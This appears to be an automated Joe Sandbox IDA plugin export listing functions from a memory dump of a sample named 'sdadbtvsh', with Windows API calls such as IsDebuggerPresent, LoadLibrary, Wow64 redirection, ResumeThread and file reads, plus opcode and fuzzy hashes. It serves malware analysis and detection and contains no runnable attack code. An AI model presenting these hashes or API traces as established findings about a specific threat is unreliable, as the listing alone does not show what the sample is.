Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: a35dddd7c2078112a399705e0dead1c695f550a77a8d375be2586bd276614243
Instruction ID: 37e21ec1d07a8ec85dcd311cb74cfb40d5b7d37a39f743d704f901df0585b97f
Opcode Fuzzy Hash: a35dddd7c2078112a399705e0dead1c695f550a77a8d375be2586bd276614243
Instruction Fuzzy Hash: 59311971A0060AEFDF14CF68C980B99BBB5FB44714F14862AF915A7240D771BE98DB90

Uniqueness

Uniqueness Score: -1.00%

Function 005AFCBB Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00595F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00596049

KillTimer.USER32(?,00000001,?,?), ref: 005AFD44
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005AFD53
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 005EFDD3

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 3e4976923ed2149d35612c337cabfaaee7703dccbe971cb03c2868fea0e9c089
Instruction ID: 5d63e764d7b2bd37ee11c8bf1c8562c67a94aea3f06dee1efacb1caed0183c1d
Opcode Fuzzy Hash: 3e4976923ed2149d35612c337cabfaaee7703dccbe971cb03c2868fea0e9c089
Instruction Fuzzy Hash: EC31C571904784AFEB32CF258C95BE6BFECBB02308F1004AED5D957241C7745A85CB51

Uniqueness

Uniqueness Score: -1.00%

Function 005C8A3E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,005C895C,?,00659CE8,0000000C), ref: 005C8A94
GetLastError.KERNEL32(?,005C895C,?,00659CE8,0000000C), ref: 005C8A9E
__dosmaperr.LIBCMT ref: 005C8AC9

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 961addea087371542037df269ebb4eea93045e138ca43b27cd76a9027cf7469f
Instruction ID: 22b047ec5d4674b651e5a0f232bf1494029cf5d6b7c8e10456a4193cdf8ae27b
Opcode Fuzzy Hash: 961addea087371542037df269ebb4eea93045e138ca43b27cd76a9027cf7469f
Instruction Fuzzy Hash: 9E0108326059605ED72463F49C89F7E6F8ABBC2774F29061FE8189B1D2EE709CC59290

Uniqueness

Uniqueness Score: -1.00%

Function 005C971B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,005C97CA,FF8BC369,00000000,00000002,00000000), ref: 005C9754
GetLastError.KERNEL32(?,005C97CA,FF8BC369,00000000,00000002,00000000,?,005C5EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,005B6F61), ref: 005C975E
__dosmaperr.LIBCMT ref: 005C9765

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 323b7213c381dbc057beedc6c3df426085961a3c8487aee6cb2c2ccea58dec6d
Instruction ID: bd3ee8074a05ec738ba54a937d45aa944a649f1053608dbc518334e4bdc75ade
Opcode Fuzzy Hash: 323b7213c381dbc057beedc6c3df426085961a3c8487aee6cb2c2ccea58dec6d
Instruction Fuzzy Hash: E7012832621515AFCB059FD9DC0DDAE3F6AFB86330B24020DF8108B190EA70AD519BD0

Uniqueness

Uniqueness Score: -1.00%

Function 005A2AD0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 005A2FB6

Strings

CALL, xrefs: 005A2F86

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: e32103f5ff0905736174356f93e0e120985369c13887171404aee744d13eba23
Instruction ID: 624f3716c4365e1d5728c75a49e6fb1bf8c070fd4381f140f7c05be45e9ade4a
Opcode Fuzzy Hash: e32103f5ff0905736174356f93e0e120985369c13887171404aee744d13eba23
Instruction Fuzzy Hash: 5E228A706082429FC718DF18C885A2EBFF6BF8A314F14895DF4968B3A2D771E945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 005941E6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,005933E9,00662418,?,?,?,?,?,?,?,005932EF,?), ref: 00594227

Part of subcall function 005984B7: _wcslen.LIBCMT ref: 005984CA

Strings

$f, xrefs: 00594241

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: FullNamePath_wcslen
String ID: $f
API String ID: 4019309064-2970136919
Opcode ID: 0ab41117390b85d88b36113554c2f0928cdcd88b85ef13e488db46220d73d84d
Instruction ID: fc60b8d4d0ff1145cb0025198f9acc3a9bdb5f832b8df587594e21d9b9bf3db4
Opcode Fuzzy Hash: 0ab41117390b85d88b36113554c2f0928cdcd88b85ef13e488db46220d73d84d
Instruction Fuzzy Hash: 2611A13560060A9B8F11EBA4D805EDD7FEDBF89354F000066B589D3281EE74AB859F51

Uniqueness

Uniqueness Score: -1.00%

Function 006095F6 Relevance: 3.1, APIs: 2, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 0059557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00595558,?,?,005D4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0059559E

WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00609665
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00609673

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: PrivateProfileStringWrite$FullNamePath
String ID:
API String ID: 3876400906-0
Opcode ID: 8717cbccd6ca55ddce63c6eade253b8f55399bca058c7eda6fc7cabe256439b6
Instruction ID: de54c04079f3da9c407051ea73f49eadae4d1cab150be45266a5f37be129650b
Opcode Fuzzy Hash: 8717cbccd6ca55ddce63c6eade253b8f55399bca058c7eda6fc7cabe256439b6
Instruction Fuzzy Hash: 22111C79600A169FDF10EB64C855D6FBBBAFF89360B058444E856AB361CB30FD01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00596E52 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00593B33,?,00008000), ref: 00596E80
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00593B33,?,00008000), ref: 005D59A2

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6376a6578ee60a1ab59c6a044ca1c72a55cd80a4967249f6ea434b85f73c2538
Instruction ID: c12b72bd156c6549ab9e61e26ceabad3fc027cc496cc347a9657553c7268e968
Opcode Fuzzy Hash: 6376a6578ee60a1ab59c6a044ca1c72a55cd80a4967249f6ea434b85f73c2538
Instruction Fuzzy Hash: F2017131245225BAE7341A2ACC0EF977F99FF067B4F148311BE99AA1E0C7B45859CB90

Uniqueness

Uniqueness Score: -1.00%

Function 005932A2 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 005932C4

Part of subcall function 0059326D: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00593282
Part of subcall function 0059326D: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00593299

Part of subcall function 00593312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,005932EF,?), ref: 00593342
Part of subcall function 00593312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,005932EF,?), ref: 00593355
Part of subcall function 00593312: GetFullPathNameW.KERNEL32(00007FFF,?,?,00662418,00662400,?,?,?,?,?,?,005932EF,?), ref: 005933C1
Part of subcall function 00593312: SetCurrentDirectoryW.KERNELBASE(?,00000001,00662418,?,?,?,?,?,?,?,005932EF,?), ref: 00593442

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 005932FE

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: 71884711989b62a31137c18a1492712b70f146a776952a0138faeac8d9cd32c6
Instruction ID: 626097b1b0f2976cdd4ec5bc654f9da9f41f63a475fb81ac8c96ac46d4e8fab9
Opcode Fuzzy Hash: 71884711989b62a31137c18a1492712b70f146a776952a0138faeac8d9cd32c6
Instruction Fuzzy Hash: 95F05E71954B46EFEB00AF60EC1EB643F92B704709F105C15F109AA2E2DBF99551CB00

Uniqueness

Uniqueness Score: -1.00%

Function 005AF95E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 005AF97A
Sleep.KERNEL32(00000000), ref: 005EFAC2

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: SleepTimetime
String ID:
API String ID: 346578373-0
Opcode ID: 65672d22726bf90f62163b408e0b9756d27f7deb762f2c8f9efac80577811a07
Instruction ID: 33b463004a45d8f56d1e08554db49e3d45a843dc1b6eb2d72e50d2ec8a5b4c4a
Opcode Fuzzy Hash: 65672d22726bf90f62163b408e0b9756d27f7deb762f2c8f9efac80577811a07
Instruction Fuzzy Hash: BAF082712406069FD314EB65D409B5ABFE9FF89350F004429E45ACB250DB70B811CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00598774 Relevance: 2.6, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,0059AE65,?,?,?), ref: 00598793
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,0059AE65,?,?,?), ref: 005987C9

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 139b95cae51ca0183c1e0e6f7f1804381a9e2799acfcee29d4caa511208e0f95
Instruction ID: 3d8cd1630f697d818ce1b4e6de565b9175dbe5434d2ab27b301332f6dfa235ef
Opcode Fuzzy Hash: 139b95cae51ca0183c1e0e6f7f1804381a9e2799acfcee29d4caa511208e0f95
Instruction Fuzzy Hash: 9B01BC713002057FEB18ABA99D4FF7F7EA9EBC5340F10002EB102DA1E1EEA1AC018224

Uniqueness

Uniqueness Score: -1.00%

Function 005BF126 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c62506a869aa156e38769c0cc4508cb6f7f88d9dd0d45ea87774f3300c2a57b
Instruction ID: e1b6fd5099559b909530b6cbf859a69fe6bf6f8d54cbdb5c929e7fb7b761d1cb
Opcode Fuzzy Hash: 5c62506a869aa156e38769c0cc4508cb6f7f88d9dd0d45ea87774f3300c2a57b
Instruction Fuzzy Hash: 0A519479A00144AFDB10DF68CC45AE9BFB1FB85364F198168EC089B392C771BD42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 005FFBCA Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 005FFBE3

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: fdd641d0e3c759bbc6edbd497629e5b37a799458355cd6572793c07909cc6e65
Instruction ID: 78d7bd3b5aa619cacaa8be6b1ad63a3f9bfef85af84a55695de20c357903a2d1
Opcode Fuzzy Hash: fdd641d0e3c759bbc6edbd497629e5b37a799458355cd6572793c07909cc6e65
Instruction Fuzzy Hash: 1B41A1B690020DAFDB15AF64C8859AF7BB9FF84310B11853EEA16D7641EB74EE04CB50

Uniqueness

Uniqueness Score: -1.00%

Function 005B0000 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 005B00AF

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 95419de641390aa5f605f17950655d87077dbb7570f641cd1d1b7c2a569bdf9e
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 9B31D874A00109DFC718EF58C488AAAFBB5FB59310BA496A5E40ACB295D731EDC1CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00608E39 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0059557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00595558,?,?,005D4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0059559E

GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 00608EBE

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: FullNamePathPrivateProfileString
String ID:
API String ID: 1991638491-0
Opcode ID: fa93c0299abb196467247f1c32e29fee4ce863ea48e909104151c36f2f12cd2a
Instruction ID: 6615f95e6d69feb84b861e47c2adaefb246bf05447a6c1eab65c1a60cc3d0ba5
Opcode Fuzzy Hash: fa93c0299abb196467247f1c32e29fee4ce863ea48e909104151c36f2f12cd2a
Instruction Fuzzy Hash: 4C211D35600616AFCF15EB64C95ACAEBBB5FF89360B048054FA45AB3A1DB30FD51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0059636D Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00596332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0059637F,?,?,005960AA,?,00000001,?,?,00000000), ref: 0059633E
Part of subcall function 00596332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00596350
Part of subcall function 00596332: FreeLibrary.KERNEL32(00000000,?,?,0059637F,?,?,005960AA,?,00000001,?,?,00000000), ref: 00596362

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,005960AA,?,00000001,?,?,00000000), ref: 0059639F

Part of subcall function 005962FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,005D54C3,?,?,005960AA,?,00000001,?,?,00000000), ref: 00596304
Part of subcall function 005962FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00596316
Part of subcall function 005962FB: FreeLibrary.KERNEL32(00000000,?,?,005D54C3,?,?,005960AA,?,00000001,?,?,00000000), ref: 00596329

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 46dbbeb708c072f20734c3a461f8eae8c0397d186081e077e15016181f5fed47
Instruction ID: d5e171f45db82651bbfe4e2564ad782dc820769fb2f97173d4ba8388092c64bc
Opcode Fuzzy Hash: 46dbbeb708c072f20734c3a461f8eae8c0397d186081e077e15016181f5fed47
Instruction Fuzzy Hash: 09110A31600616AACF24FB74CC16FAD7FA5BF90711F50882EF442AB1C1EEB49A499750

Uniqueness

Uniqueness Score: -1.00%

Function 005C8792 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 005C87D0

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: b48ef03c42561f68179b61a687806d525df70c9ab54f30acdbe2bdfe12379bdf
Instruction ID: 5a542233a6cbd843f40b0f850e7d3839229cf13d7062721e82931db57325ca1b
Opcode Fuzzy Hash: b48ef03c42561f68179b61a687806d525df70c9ab54f30acdbe2bdfe12379bdf
Instruction Fuzzy Hash: 88115A7190410AAFCF15DF98E940EAE7BF5FF48310F14406AF808AB312DA71EA11CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0059B050 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00596B73,?,00010000,00000000,00000000,00000000,00000000), ref: 0059B0AC

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7929830c13798d1fc3a88e01aafdfb130745e4e9b88dd0e35e764d435fb875a0
Instruction ID: 0f76f6d198a2f48520834027e35151309c170a4c3105fe5260d6c58f3f83d27f
Opcode Fuzzy Hash: 7929830c13798d1fc3a88e01aafdfb130745e4e9b88dd0e35e764d435fb875a0
Instruction Fuzzy Hash: EF113A31200705DFFB208E15D988B67BBE9FF44754F14C82DE9AA87A51C772A945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 005C5390 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 005C500D: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,005C31B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 005C504E

_free.LIBCMT ref: 005C53FC

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

